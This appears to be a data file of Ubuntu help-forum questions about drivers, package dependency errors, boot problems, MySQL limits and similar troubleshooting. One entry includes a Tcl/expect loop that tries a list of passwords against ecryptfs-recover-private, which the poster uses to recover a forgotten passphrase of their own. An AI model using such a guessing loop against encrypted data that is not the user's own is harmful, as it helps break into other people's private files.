275687	how to install touch pad driver on inspiron 7220 se ?	i am trying to install this driver : https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/606238/comments/202 my command line : augre @ augre-inspiron-7720 : ~/downloads/usr/src/psmouse-alps-1.3 $ bash alps.sh usage : alps.sh func [ func ] + valid funcs : a_parseargs a_usage dkms_bld_kc dkms_build_alps dkms_install_cp dkms_install_symlink dkms_pkg_tarball git qemu_add_driver qemu_clean_and_config qemu_create qemu_grow_img qemu_make qemu_mon qemu_run qemu_update_bios run_alps_debug run_dsdt_get run_tp_check run_tp_diags run_tune_alps what can i do to fix this ? i have tried to build it , but get the following error : augre @ augre-inspiron-7720 : ~/downloads/usr/src/psmouse-alps-1.3 $ sudo bash alps.sh dkms_build_alps must run dkms_install_cp or dkms_install_symlink before this /usr/src/psmouse-alps-1.3/dkms.conf must have package_version set to alps-1.3 sudo : dkms : command not found /usr/src/psmouse-alps-1.3/dkms.conf must have package_version set to alps-1.3 this places the psmouse.ko dlkm in /lib/modules/3.5.0-26-generic/updates/dkms sudo : dkms : command not found build failed cat : /var/lib/dkms/psmouse/alps-1.3/build/make.log : no such file or directory
275693	need tcl help related to expect	i created a program that inputs passwords contained in a list into ecryptfs-recover-private . people with encrypted directories that know the basic structure of their password , but are n't sure of the exact password , will find this code helpful . yes , the best scenario is to write down your password if you are n't using it for an extended period of time , like after your computer crashes out . i recommend this method so that you do n't have to learn a little tcl and write scripts for expect . while not fancy , i have a basic framework that is doing everything one needs to input passwords contained in a list into the ecryptfs-recover-private program to test and see if the password is acceptable or not . it is posted over at linuxquestions.org since it allows for more readable formatting than i know how to use here . the link is : http : //www.linuxquestions.org/questions/programming-9/expect-tcl-programming-pproblem-4175455604/ # post4919679 i have one problem that prevents multiple password entry program from being usable . i do n't know the results of a match are because i have n't seen a match yet . i 'm still searching for my password or , if it was found , the script simply kept running and i did n't notice the anomaly of a successful password . until i get an exact match , i 'd like some code at the end of the script posted at the previously mentioned link , above , that will stop the script from running if none of the previous expect conditions were met . ... set pwlist [ list test1 test2 ] foreach password $ pwlist { spawn sudo `` ecryptfs-recover-private '' expect -exact `` try to recover this directory ? \ [ y/n\ ] : `` send -- `` y\r '' expect -exact `` y\r info : found your wrapped-passphrase\r do you know your login passphrase ? \ [ y/n\ ] `` send -- `` y\r '' expect -exact `` y\r info : enter your login passphrase ... \r passphrase : `` send -- `` $ password\r '' expect -exact `` \r error : unwrapping passphrase and inserting into the user session keyring failed \ [ -5\ ] \r info : check the system log for more information from libecryptfs\r \ ] 0 ; xubuntu @ xubuntu : ~xubuntu @ xubuntu : ~\ $ `` puts $ password # need some kind of code structure that will stop the script at this point , # but only if none of the above expect actions were triggered. }
275697	mysql error : ca n't create a new thread ( errno 11 )	i have a db server running mysql server , and 5 slaves . i always get the error : mysql error : ca n't create a new thread ( errno 11 ) ; if you are not out of available memory , you can consult the manual for a possible os-dependent bug though i set ulimited root @ master : ~ # ulimit -a core file size ( blocks , -c ) 0 data seg size ( kbytes , -d ) unlimited scheduling priority ( -e ) 0 file size ( blocks , -f ) unlimited pending signals ( -i ) 2062915 max locked memory ( kbytes , -l ) 64 max memory size ( kbytes , -m ) unlimited open files ( -n ) 1000000 pipe size ( 512 bytes , -p ) 8 posix message queues ( bytes , -q ) 819200 real-time priority ( -r ) 0 stack size ( kbytes , -s ) 8192 cpu time ( seconds , -t ) unlimited max user processes ( -u ) 1000000 virtual memory ( kbytes , -v ) unlimited file locks ( -x ) unlimited root @ master : ~ # cat /proc/`pidof mysqld`/limits | egrep `` ( processes|files ) '' max processes 1000000 1000000 processes max open files 1000000 1000000 files every request to the db server is around 30k .
275702	problem upgrading from 12.04 to 12.10	i just tried to update ubuntu from precise to quantal from the update manager , and after it finished , i can get to the grub screen just fine , and select ubuntu , but no dice on the load . when 12.10 tries to load , all get the following error message , which quickly disappears : gpio_ich : failed to claim resource 0 after this , my screen goes blank , with a blinking cursor in the upper left hand corner that has sat there for literally 15 minutes before i get fed up and hit the power button . i have run boot repair , to no avail . i have also boot up linux in recovery mode and tried to repair broken packages . also , no dice . the latest report from my boot repair log is here . i have been running ubuntu since 10.04 , and this is the first upgrade issue i have had . does anyone here have a clue what went wrong ? i have never had to do this before , so it feels kinda weird . also , worst case scenario : if i download the 12.10 iso and install from that , can i do an upgrade on my system without losing files ? i 've never had to do this before , so never had to find out or ask .
275703	how to setup user accounts on large network	i am migrating a set of 20 computers to ubuntu and will be having only this os . the previous os needs to be discarded along with all its associated headaches and dependencies . i have so far managed to install ubuntu precise and need help in setting up the user accounts . the users would need access to shared folders on other computers as well as a network storage device . how to create users on the individual computers which will allow this ? also i require a single administrative ( root / other ) login for all the computers . any help would be highly appreciated .
275704	how to permanently set environmental variables path and m2_home in ubuntu for maven3 ?	i have downloaded the latest apache-maven3.zip file and extracted it to the folder : /home/gaurav/java/maven3 . i do n't know how to set the environmental variables for maven - such as path and m2_home . i tried below things : export m2_home=/home/gaurav/java/maven3 export path= /home/gaurav/java/maven3/bin : $ { path } after setting that , i ran mvn -- version and it is running correctly . but when next time i start my machine , and type $ m2_home , its not showing me the details of the path variables , neither mvn -- version is getting executed . please help me to resolve this problem of permanently setting environment variables in ubuntu .
275706	usb pen drive is detected in windows but not in ubuntu	my sony pen drive gets detected in windows but i can not find it on my ubuntu . i formatted the drive with fat , fat32 and ntfs but the same problem . i went through faqs but did not find anything helpful . i can see typing lsusb gives me : paru @ paru-studio-1558 : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 004 : id 0c45:6417 microdia integrated webcam bus 002 device 003 : id 054c:0439 sony corp. paru @ paru-studio-1558 : ~ $
275707	how to use qqdvr on ubuntu ?	i want to use zoneminder , but the cctv dvr cable is rg59 not usb , so i bought qqdvr . i use terminal : lsusb bus 002 device 007 : id 04b4:8613 cypress semiconductor corp. cy7c68013 ez-usb fx2 usb 2.0 development kit** no drive ? zoneminder can not see the drive . how can i fix this ?
275709	error : alternative gem ca n't be master : it is a slave of ruby	i am struggling to get ruby up and running , and i get this message in many installations update-alternatives : error : alternative gem ca n't be master : it is a slave of ruby the full message : update-alternatives : error : alternative gem ca n't be master : it is a slave of ruby dpkg : error processing rubygems1.8 ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of libruby1.8-extras : libruby1.8-extras depends on libgems-ruby1.8 | rubygems1.8 ; however : package libgems-ruby1.8 is not installed . package rubygems1.8 is not configured yet . dpkg : error processing libruby1.8-extras ( -- configure ) : dependency problems - leaving unconfigured setting up libsqlite3-ruby1.8 ( 1.2.4-2.1 ) ... no apport report written because the error message indicates its a followup error > from a previous failure . setting up libsqlite3-ruby ( 1.2.4-2.1 ) ... setting up libxml-simple-ruby ( 1.0.12-1 ) ... setting up rake ( 0.8.7-1 ) ... dpkg : dependency problems prevent configuration of rails : rails depends on libruby1.8-extras ; however : package libruby1.8-extras is not configured yet . dpkg : error processing rails ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . > setting up zip ( 3.0-2 ) ... errors were encountered while processing : rubygems1.8 libruby1.8-extras rails e : sub-process /usr/bin/dpkg returned an error code ( 1 ) ubuntu 10.4 ruby1.9.1
275710	ca n't choose which operating system will be loaded	i 've installed ubuntu 12.04 lts from cd and i selected a parameter to install it with windows 8 , and i could choose which system to boot . but when i boot , nothing happens , and windows loading as usual . how to fix it ?
275719	reinstall package and its installed dependencies	i 've got a package installed that is broken ( the package itself , not its dependencies ) . reinstalling it with sudo dpkg-reconfigure < package > or sudo apt-get -- reinstall install < package > did not do the trick . i 'd like to try and reinstall the package , including all its currently installed dependencies . is there a way to do this ?
275720	syslog kernlog xorg.0.log - is it safe to post them	is it safe to post syslog kernlog xorg.o.log from /var/log online to solve a problem with ubuntu system ? there is private content in there that other people should not see ? thanks
275725	how are bugs classified as `` by 12.04 standards '' ?	i have been checking the ubuntu errors page , but in the legend i noticed that both 12.10 and 13.04 are listed twice . once just ubuntu 12.10 , and another ubuntu 12.10 ( by 12.04 standards ) . so what classifies an error to be in 12.04 standards and what does n't ?
275726	error while upgade	while upgrading ubuntu 12.10 by terminal using sudo apt-get upgrade i get this error reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libtinyxml-dev : depends : libtinyxml ( = 2.6.2-2~ppa1 ) but it is not installed e : unmet dependencies . try using -f. i have tried all ways but could not solve the problem . here is the result of appropriate commands . i tried sudo apt-cache search libtinyxml and result was : root @ nadirhajiyev : /home/nadirhajiyev # sudo apt-cache search libtinyxml libtinyxml-dev - tinyxml library - header and static library libtinyxml-doc - tinyxml library - documentation files libtinyxml2-0.0.0 - c++ xml parsing library libtinyxml2-dev - tinyxml2 library - header and static library libtinyxml2.6.2 - c++ xml parsing library libtinyxml2.6.2-dbg - tinyxml library - debug files libtinyxml2.5.3 - dummy transitional package from libtinyxml2.5.3 to libtinyxml libtinyxml2.5.3-dbg - dummy transitional package from libtinyxml2.5.3-dbg to libtinyxml-dbg libtinyxml - c++ xml parsing library libtinyxml-dbg - tinyxml library - debug files then apt-get install -y libtinyxml libtinyxml-dev : root @ nadirhajiyev : /home/nadirhajiyev # apt-get install -y libtinyxml libtinyxml-dev reading package lists ... done building dependency tree reading state information ... done libtinyxml-dev is already the newest version . libtinyxml-dev set to manually installed . the following packages were automatically installed and are no longer required : erlang-base erlang-crypto erlang-syntax-tools libqt4-webkit : i386 libsctp1 linux-headers-3.5.0-17 lksctp-tools ros-groovy-orocos-kinematics-dynamics use 'apt-get autoremove ' to remove them . the following new packages will be installed : libtinyxml 0 upgraded , 1 newly installed , 0 to remove and 249 not upgraded.3 not fully installed or removed . need to get 0 b/35.4 kb of archives . after this operation , 139 kb of additional disk space will be used . ( reading database ... 260756 files and directories currently installed . ) unpacking libtinyxml ( from ... /libtinyxml_2.6.2-2~ppa1_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/libtinyxml_2.6.2-2~ppa1_amd64.deb ( -- unpack ) : trying to overwrite '/usr/lib/libtinyxml.so.2.6.2 ' , which is also in package libtinyxml2.6.2 2.6.2-1build1 errors were encountered while processing : /var/cache/apt/archives/libtinyxml_2.6.2-2~ppa1_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) then apt-get install -y -- reinstall libtinyxml libtinyxml-dev : root @ nadirhajiyev : /home/nadirhajiyev # apt-get install -y libtinyxml libtinyxml-dev -- reinstall reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : erlang-base erlang-crypto erlang-syntax-tools libqt4-webkit : i386 libsctp1 linux-headers-3.5.0-17 lksctp-tools ros-groovy-orocos-kinematics-dynamics use 'apt-get autoremove ' to remove them . the following new packages will be installed : libtinyxml 0 upgraded , 1 newly installed , 1 reinstalled , 0 to remove and 249 not upgraded . 3 not fully installed or removed . need to get 0 b/35.4 kb of archives . after this operation , 139 kb of additional disk space will be used . e : internal error , no file name for libtinyxml-dev : amd64 finally i tried to remove it but i got : root @ nadirhajiyev : /home/nadirhajiyev # apt-get purge -y libtinyxml libtinyxml-dev reading package lists ... done building dependency tree reading state information ... done package 'libtinyxml ' is not installed , so not removed you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : ros-groovy-nodelet : depends : libtinyxml-dev but it is not going to be installed ros-groovy-pluginlib : depends : libtinyxml-dev but it is not going to be installed ros-groovy-rospack : depends : libtinyxml-dev but it is not going to be installed ros-groovy-simulator-gazebo : depends : libtinyxml-dev but it is not going to be installed ros-groovy-srdf : depends : libtinyxml-dev but it is not going to be installed ros-groovy-srdfdom : depends : libtinyxml-dev but it is not going to be installed ros-groovy-urdfdom : depends : libtinyxml-dev but it is not going to be installed ros-groovy-urdfdom-headers : depends : libtinyxml-dev but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
275729	sendmail that delivers all mail to a directory , storing it separately	i used the configuration local only sendmail that delivers all mail to a directory , but it is not enough for me . the solution above store all emails into one file - /var/mail/mylocaluser . how to store emails separately - one email in one file ?
275732	firefox in ubuntu 12.04 does not show the webpage properly	how do i make firefox in ubuntu display the website like firefox in windows ? the settings are exactly the same in both os ' . thay have the same mscorefonts but somehow , firefox on ubuntu displays it 's stock times font instead of what the site requests . how do i get firefox on ubuntu to work to display some pages correctly ? thanks .
275735	how can i make samsung note 10.1 dual boot with ubuntu	i have a samsung note 10.1 with android 4.1.2 and i want to ask if it is possible to make it dual boot with ubuntu . ( and how of course )
275739	is there a paper design software for ubuntu ?	or what would you use for a such task ? scribus ? i wish to experiment with a new kind of music notation wich i 'm developing and i need to have a customized sheet paper .
275742	how to delete private data from log files ?	i have heard that log files contains private data . how can i remove it and what files should i remove from them ? those are very long files so maybe if i know what to remove i can use a script or something else . any suggestions ? thanks .
275745	random crash of system while using ubuntu 12.04 lts with dual boot using wubi	i have reported a system crash and system freezing while running ubuntu 12.04.2 lts . installed ubuntu using wubi windows installer but faces problems every time it crash after some time shows the black screen with written that `` critical temperature reached 85 c '' and system go to crash . please help me to out of this problem . my system information sony vaio vpcea45fg ( e series ) hard disk- 320 gb logical partition for ubuntu host is 50 gb ram-4 gb processor-intel core i3-380m processor 2.53 gb 64 bit operating system .
275746	launching php script through comman line - keeping terminal window open after execution	oh , my girlfriend really likes it when i launch php scripts ! there 's something special about them , she says ... thus , i coded this script to run throught the cli ( command line interface ) - so it 's running locally , not on a web server . it launches just fine through right click > open > run in terminal but closes right after execution . **is there a way to keep the terminal window open ? of course i can launch it through a terminal window - which would stay open - but i 'm looking for a one click action . with bash scripts i use $ shell but that did n't work ( see code below ) . so far , the only thing i came up with is sleep ( 10 ) ; which gives me 10 seconds for my girl to check the output . i 'd rather close the terminal window manually , though . # ! /usr/bin/php -q < ? php echo `` hello world \n '' ; # wait before closing terminal window sleep ( 10 ) ; # the following line does n't work $ shell ; ? > ( php 5.4.6-1ubuntu1.2 ( cli ) ( built : mar 11 2013 14:57:54 ) copyright ( c ) 1997-2012 the php group zend engine v2.4.0 , copyright ( c ) 1998-2012 zend technologies )
275748	pdfbeads will only output a single page	following the instructions from this page i take a djvu document , check it for any sign of corruption by opening it in djvulibre and it checks out fine . copy it to my testing folder and rename it perform djvu2hocr test.djvu | sed 's/ocrx/ocr/g ' > test.html ddjvu -format=tiff test.djvu test.tif proceed to open the tif with evince and it checks out all pages are viewable . run pdfbeads pdfbeads -o test.pdf and get the following error : /usr/lib/ruby/1.9.1/rubygems/custom_require.rb:36 : in `require ' : iconv will be deprecated in the future , use string # encode instead . prepared data for processing test.tif warning : test.tif contains multiple images , but only the first one is going to be used jbig2 compression complete . pages:1 symbols:2080 log2:12 processed test.tif the pdf opens fine , but it is only a single page and the ocr works . here 's a link to the files copied/generated any suggestions ?
275750	mouse and keyboard freezes in lightdm	after last system update ( week ago ) i noticed that my mouse and keyboard freezes after boot-up , in the lightdm login screen for 1-2 minutes , so i ca n't move pointer or type my password . although , my personalized wallpaper appears , cursor in password field blinks and notification about internet connection appears , so it 's not the entire screen freeze . after these 1-2 minutes , mouse and keyboard start working until next boot ( i did n't noticed freeze after logout to lightdm login screen ) . it 's pretty annoying , so i will grateful for help . i 'm using ubuntu 12.10 stable release and grub as bootloader . if you 'll need more information about my software or hardware , ask . oh , and i 've got wired keyboard and mouse , not wireless .
275756	facebook chat not getting connected in empathy	i 've been using ubuntu 12.04 for months now , and empathy was working perfectly fine . even gwibber . but lately , these both have stopped working ! the connection for facebook chat is not getting accepted in empathy whereas in gwibber , i only get a blank screen when i link my facebook account .
275757	install 32 bit jre on 64 bit ubuntu 12.04 for nokia sdk 2.0	i have successfully install java for my ubuntu through terminal but in mobile project want to include nokia sdk 2.0 but this platform is not able to run without 32bit jre . error the sdk could not locate a java runtime enviroment ( jre ) .you must install jre6 to run this sdk . done then i have download 32 bit jre form oracle and install it into a folder but i understant where to move this folder or set the path for 32 bit java . if anyone knows about it please help . as if i check java from terminal java -d32 -version this java instance does not support a 32-bit jvm . please install the desired version .
275760	how to remove error sound ?	so i am getting quite annoyed by the ubuntu error sound bell.oga that is played sometimes . for example , try to tab complete something in a terminal that does n't exist and it will play the sound . i managed to locate what was playing and deleted /usr/share/sounds/freedesktop/stereo/bell.oga but it still plays . any ideas ?
275767	gimp crashes on jpeg save	sometimes different applications crashes , and the system notifies me that crashed application uses third party library ( libz ) and suggests trying without it . i can always reproduce it by exporting png file to jpeg format in gimp : ( full size screenshot ) when i first experienced the issue i had libz 1.2.5 installed in the system , then i updated it to 1.2.7 , but the issue persists . i do n't know when and what this library was installed for . i googled a lot for this , but has n't find anything useful , so it looks like this is special case . ===========update 7.04.2013=========== after looking into strace output i do n't think that my issue is related to zlib . so i 'm changing the question title here is strace gimp output ( launcher icons size = 36 , `` radiance '' gnome theme ) futex ( 0x15b3434 , futex_wake_op_private , 1 , 1 , 0x15b3430 , { futex_op_set , 0 , futex_op_cmp_gt , 1 } ) = 1 futex ( 0x15b0fb0 , futex_wake_private , 1 ) = 1 futex ( 0x1c4a560 , futex_wake_private , 1 ) = 1 lstat ( `` / '' , { st_mode=s_ifdir|0755 , st_size=4096 , ... } ) = 0 lstat ( `` /usr/share/icons/humanity/devices/16/drive-harddisk.svg '' , { st_mode=s_ifreg|0644 , st_size=7338 , ... } ) = 0 open ( `` /usr/share/icons/humanity/devices/16/drive-harddisk.svg '' , o_rdonly ) = 19 fstat ( 19 , { st_mode=s_ifreg|0644 , st_size=7338 , ... } ) = 0 read ( 19 , `` < ? xml version=\ '' 1.0\ '' encoding=\ '' ut '' ... , 65536 ) = 7338 read ( 19 , `` '' , 65536 ) = 0 close ( 19 ) = 0 write ( 2 , `` \n ( gimp:19027 ) : gtk-critical ** : `` ... , 106 ( gimp:19027 ) : gtk-critical ** : ia__gtk_tree_model_get : assertion `gtk_is_tree_model ( tree_model ) ' failed ) = 106 -- - sigsegv ( segmentation fault ) @ 0 ( 0 ) -- - ( script-fu:19034 ) : libgimpbase-warning ** : script-fu : gimp_wire_read ( ) : error +++ killed by sigsegv ( core dumped ) +++ segmentation fault ( core dumped ) i 've read several threads with similar issues discussion , and those issues were related to gnome theme , icons , unity launcher icons size etc ... i tried to play with those packages reinstalling , settings but nothing helped me . ===================================== so can anybody suggest me please what i should check and try ? # file /usr/local/lib/libz.so.1.2.7 /usr/local/lib/libz.so.1.2.7 : elf 64-bit lsb shared object , x86-64 , version 1 ( sysv ) , dynamically linked , buildid [ sha1 ] =0x4b579c2bcc6eb41c0dc9c473e8298e5249fedbe1 , not stripped # md5sum /usr/local/lib/libz.so.1.2.7 65ffc4f5f7b943cd569ba2136cd49f7b /usr/local/lib/libz.so.1.2.7 # ls -lh /usr/local/lib/libz.so.1.2.7 -rwxr-xr-x 1 root root 99k лют 9 19:54 /usr/local/lib/libz.so.1.2.7 system : ubuntu 12.04 x64_86 gimp 2.6.12 thank you in advance .
275770	quadrapassel on ubuntu 11.10	quadrapassel does not work properly on any version after 11.10 , it just got upgraded to gnome games . is it possible to install 11.10 quadrapassel on newer versions ?
275771	can not connect to a wireless network on msi u135dx	i recently installed ubuntu 12.10 on my msi u135dx alongside with windows 7 . the problem is that it can detect wireless networks but ca n't connect to it . but when i 'm on windows 7 it works just fine . how can i fix this ? thanks .
275772	bumblebee , ubuntu 13.04 could not load gpu driver	i have a asus zenbook ux32vd laptop , using nvidia optimus technology and having two graphics cards : one from intel and one from nvidia . i 've been running ubuntu 13.04 happily for a month now using bumblebee 's optirun successfully . today optirun suddenly did n't work : ➜ ~ optirun -vv glxgears [ 529.776886 ] [ debug ] reading file : /etc/bumblebee/bumblebee.conf [ 529.777578 ] [ info ] configured driver : nvidia-304 [ 529.777895 ] [ debug ] optirun version 3.1 starting ... [ 529.777928 ] [ debug ] active configuration : [ 529.777938 ] [ debug ] bumblebeed config file : /etc/bumblebee/bumblebee.conf [ 529.777948 ] [ debug ] x display : :8 [ 529.777957 ] [ debug ] ld_library_path : [ 529.777966 ] [ debug ] socket path : /var/run/bumblebee.socket [ 529.777975 ] [ debug ] accel/display bridge : auto [ 529.777984 ] [ debug ] vgl compression : proxy [ 529.778056 ] [ debug ] using auto-detected bridge virtualgl [ 529.827706 ] [ info ] response : no - error : could not load gpu driver [ 529.827756 ] [ error ] can not access secondary gpu - error : could not load gpu driver [ 529.827777 ] [ debug ] socket closed . [ 529.827828 ] [ error ] aborting because fallback start is disabled . [ 529.827847 ] [ debug ] killing all remaining processes . my bumblebee.conf contains the following : [ bumblebeed ] # the secondary xorg server display number virtualdisplay=:8 keepunusedxserver=false servergroup=bumblebee turncardoffatexit=false noecomodeoverride=false driver=nvidia-304 # # client options . will take effect on the next optirun executed . [ optirun ] # acceleration/ rendering bridge , possible values are auto , virtualgl and # primus . bridge=auto # the method used for virtualgl to transport frames between x servers . # possible values are proxy , jpeg , rgb , xv and yuv . vgltransport=proxy # should the program run under optirun even if bumblebee server or nvidia card # is not available ? allowfallbacktoigc=false # # section with nvidia driver specific options , only parsed if driver=nvidia [ driver-nvidia ] # module name to load , defaults to driver if empty or unset kerneldriver=nvidia-304 module=nvidia-304 pmmethod=auto # colon-separated path to the nvidia libraries librarypath=/usr/lib/nvidia-304 : /usr/lib32/nvidia-304 # comma-separated path of the directory containing nvidia_drv.so and the # default xorg modules path xorgmodulepath=/usr/lib/nvidia-304/xorg , /usr/lib/xorg/modules xorgconffile=/etc/bumblebee/xorg.conf.nvidia # # section with nouveau driver specific options , only parsed if driver=nouveau [ driver-nouveau ] kerneldriver=nouveau pmmethod=auto xorgconffile=/etc/bumblebee/xorg.conf.nouveau and xorg.conf.nvidia : section `` serverlayout '' identifier `` layout0 '' option `` autoadddevices '' `` false '' endsection section `` device '' identifier `` device1 '' driver `` nvidia '' vendorname `` nvidia corporation '' option `` nologo '' `` true '' option `` useedid '' `` true '' option `` connectedmonitor '' `` dfp '' endsection lspci lists the nvidia card : 01:00.0 3d controller : nvidia corporation device 1140 ( rev a1 ) subsystem : asustek computer inc. device 1507 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 16 region 0 : memory at f6000000 ( 32-bit , non-prefetchable ) [ size=16m ] region 1 : memory at e0000000 ( 64-bit , prefetchable ) [ size=256m ] region 3 : memory at f0000000 ( 64-bit , prefetchable ) [ size=32m ] region 5 : i/o ports at e000 [ size=128 ] expansion rom at f7000000 [ disabled ] [ size=512k ] capabilities : [ 60 ] power management version 3 flags : pmeclk- dsi- d1- d2- auxcurrent=0ma pme ( d0- , d1- , d2- , d3hot- , d3cold- ) status : d0 nosoftrst+ pme-enable- dsel=0 dscale=0 pme- capabilities : [ 68 ] msi : enable- count=1/1 maskable- 64bit+ address : 0000000000000000 data : 0000 capabilities : [ 78 ] express ( v2 ) endpoint , msi 00 devcap : maxpayload 256 bytes , phantfunc 0 , latency l0s unlimited , l1 < 64us exttag+ attnbtn- attnind- pwrind- rbe+ flreset- devctl : report errors : correctable- non-fatal- fatal- unsupported- rlxdord+ exttag+ phantfunc- auxpwr- nosnoop+ maxpayload 256 bytes , maxreadreq 512 bytes devsta : correrr- uncorrerr- fatalerr- unsuppreq- auxpwr- transpend- lnkcap : port # 0 , speed 2.5gt/s , width x16 , aspm l0s l1 , latency l0 < 512ns , l1 < 4us clockpm+ surprise- llactrep- bwnot- lnkctl : aspm l0s l1 enabled ; rcb 64 bytes disabled- retrain- commclk+ extsynch- clockpm- autwiddis- bwint- autbwint- lnksta : speed 2.5gt/s , width x8 , trerr- train- slotclk+ dlactive- bwmgmt- abwmgmt- devcap2 : completion timeout : range ab , timeoutdis+ devctl2 : completion timeout : 50us to 50ms , timeoutdis- lnkctl2 : target link speed : 2.5gt/s , entercompliance- speeddis- , selectable de-emphasis : -6db transmit margin : normal operating range , entermodifiedcompliance- compliancesos- compliance de-emphasis : -6db lnksta2 : current de-emphasis level : -3.5db , equalizationcomplete- , equalizationphase1- equalizationphase2- , equalizationphase3- , linkequalizationrequest- capabilities : [ b4 ] vendor specific information : len=14 < ? > capabilities : [ 100 v1 ] virtual channel caps : lpevc=0 refclk=100ns patentrybits=1 arb : fixed- wrr32- wrr64- wrr128- ctrl : arbselect=fixed status : inprogress- vc0 : caps : patoffset=00 maxtimeslots=1 rejsnooptrans- arb : fixed- wrr32- wrr64- wrr128- twrr128- wrr256- ctrl : enable+ id=0 arbselect=fixed tc/vc=ff status : negopending- inprogress- capabilities : [ 128 v1 ] power budgeting < ? > capabilities : [ 600 v1 ] vendor specific information : id=0001 rev=1 len=024 < ? > kernel driver in use : nvidia and all the required modules should be loaded : ➜ ~ lsmod |grep nvidia nvidia 11300875 0 ➜ ~ lsmod |grep bbswitch bbswitch 13611 0 i do n't have any specific x configuration in /etc/x11/xorg.conf.d that 's sometimes a problem with bumblebee . here 's a list with dpkg -l nvidia : ii bumblebee-nvidia 3.1-2~raringppa2 amd64 nvidia optimus support using the proprietary nvidia driver ii nvidia-304 304.84-0ubuntu2 amd64 nvidia binary xorg driver , kernel module and vdpau library rc nvidia-304-updates 304.84-0ubuntu2 amd64 nvidia binary xorg driver , kernel module and vdpau library ii nvidia-current 304.84-0ubuntu2 amd64 transitional package for nvidia-current rc nvidia-experimental-310 310.14-0ubuntu2 amd64 experimental nvidia binary xorg driver , kernel module and vdpau library rc nvidia-settings 304.51-0ubuntu2 amd64 tool for configuring the nvidia graphics driver ii nvidia-settings-304 304.64-0ubuntu1 amd64 tool for configuring the nvidia graphics driver even dmesg says the bbswitch is on and working properly : [ 5.746576 ] bbswitch : version 0.6 [ 5.746583 ] bbswitch : found integrated vga device 0000:00:02.0 : \_sb_.pci0.gfx0 [ 5.746588 ] bbswitch : found discrete vga device 0000:01:00.0 : \_sb_.pci0.peg0.pegp [ 5.746699 ] bbswitch : detected an optimus _dsm function [ 5.762030 ] bbswitch : succesfully loaded . discrete card 0000:01:00.0 is on [ 5.763705 ] bbswitch : disabling discrete graphics i 've tried to use nvidia-304 , nvidia-304-updates and nvidia-experimental-310 . none of them work .
275776	unknown filesystem . grub rescue : file not found	i have 320gb hdd messed with ububtu 10.04 and windows developers preview . i formated windows partition and deleted the linux boot folder from the disk , i thought it may help me to install newer version of linux because my windows installation was messed up with a problem and i ca n't install windows on linux . now i get a grub rescue terminal and after searching a lot i got someway out but there was another a problem when i insert the windows 7 disc . it does not give anything just a paused starting windows screen . i tried the ubuntu live cd but same problem occurred so i starting to mess with grub rescue terminal when i ran the commands : set root= ( hd0,12 ) set prefix= ( hd0,12 ) /boot/grub insmod /boot/grub/linux.mod i got the message file not found how would i fix this problem ?
275778	getting stickynotes to stay always on top ?	( just documenting this - self-answer to follow ) i am using the stickynotes applet in ubuntu natty for notes . i would occasionally like these notes to stay `` always on top '' , but i can not find a setting for anything like that ( pic from here ) : is it at all possible to somehow force a stickynotes note to stay always on top ?
275785	locale warning while executing adduser	i just tried to add an user to a group $ adduser someuser sudo perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = `` en_us : en '' , lc_all = ( unset ) , lc_paper = `` pl_pl.utf-8 '' , lc_address = `` pl_pl.utf-8 '' , lc_monetary = `` pl_pl.utf-8 '' , lc_numeric = `` pl_pl.utf-8 '' , lc_telephone = `` pl_pl.utf-8 '' , lc_identification = `` pl_pl.utf-8 '' , lc_measurement = `` pl_pl.utf-8 '' , lc_time = `` pl_pl.utf-8 '' , lc_name = `` pl_pl.utf-8 '' , lang = `` en_us.utf-8 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . adding user `someuser ' to group `sudo ' ... adding user someuser to group sudo done . what does this mean , what went wrong and how to eliminate the error ?
275786	ubuntu 12.10 64bit installation on hp pavilion g6	i have been trying to install ubuntu 12.10 - 64 bit in my system with the following config : hp pavilion g6 windows 8 - 64bit 8 gb ram intel core i5 i have read a number of articles on internet talking about the it . but the problem with me is i am unable to boot from usb , cd in any case . i have disabled the secure mode settings , and set the correct boot order . after that it never recognizes by connected flash drive or live cd . it always boots in windows 8 . any help is appreciated . please let me know which step i am doing wrong . ref : installing ubuntu on windows 8 secure boot in windows 8 dual boot with uefi mode
275787	why my dash became blue ?	before i re-installed ubuntu , my unity dash had turned blue . what made it turn blue and how do i make it look like that again ? edit : according to the comments about being too specific and since i got my answer , i simplified the question .
275788	trouble installing libflann1.7-dev on ubuntu	i am trying to install libflann1.7-dev i have removed libflann1 , so now i have no libflann at all . next i ran : sudo apt-get install libflann1.7 which installed fine , i then try to install libflann1.7-dev and get the following error : the following packages have unmet dependencies . libflann1.7-dev : depends : libflann1.7 ( = 1.7.1-1+maverick5 ) but 1.7.1-4 is to be installed e : unable to correct problems , you have held broken packages . i have no idea why , as i have just installed libflann1.7 but apparently i have version 1.7.1.4 and libflann1.7-dev needs 1.7.1.1 ? thanks
